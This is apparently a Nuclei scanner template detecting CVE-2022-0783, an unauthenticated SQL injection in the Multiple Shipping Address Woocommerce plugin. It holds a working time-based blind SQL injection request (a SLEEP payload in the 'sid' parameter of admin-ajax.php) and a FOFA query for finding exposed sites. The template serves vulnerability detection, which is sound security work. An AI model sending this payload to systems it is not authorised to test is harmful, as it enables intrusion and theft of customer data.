id: CVE-2022-0783

info:
  name: Multiple Shipping Address Woocommerce < 2.0 - SQL Injection
  author: ritikchaddha
  severity: high
  description: |
    The Multiple Shipping Address Woocommerce plugin before 2.0 does not properly sanitize and escape numerous parameters before using them in SQL statements via some AJAX actions available to unauthenticated users, leading to unauthenticated SQL injections.
  impact: |
    Unauthenticated attackers can execute time-based blind SQL injection to extract database contents, potentially exposing sensitive WooCommerce customer and order data.
  remediation: |
    Update the Multiple Shipping Address Woocommerce plugin to version 2.0 or later.
  reference:
    - https://wpscan.com/vulnerability/4d594424-8048-482d-b61c-45be1e97a8ba/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0783
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.6
    cve-id: CVE-2022-0783
    cwe-id: CWE-89
    epss-score: 0.06849
    epss-percentile: 0.93225
    cpe: cpe:2.3:a:themehigh:multiple_shipping_addresses_for_woocommerce:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: themehigh
    product: multiple_shipping_addresses_for_woocommerce
    fofa-query: body="wp-content/plugins/multiple-shipping-address-woocommerce"
  tags: cve,cve2022,wordpress,wp,wp-plugin,multiple-shipping-address-woocommerce,sqli,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=ocwma_choice_address&sid=3+AND+(SELECT+1946+FROM+(SELECT(SLEEP(7)))zsme)

    matchers:
      - type: dsl
        dsl:
          - "duration>=7"
          - "len(body) == 5"
          - "status_code==200"
          - "regex('false$', body)"
        condition: and
# digest: 4a0a0047304502206cc2911e9db238f00b6425aea085c703ee29a31609f6c26dff9f041a9c737e3d022100f37272893563efcad950e9bf1a0117420d5135683ad157549c45b04db87b34ad:922c64590222798bb761d5b6d8e72950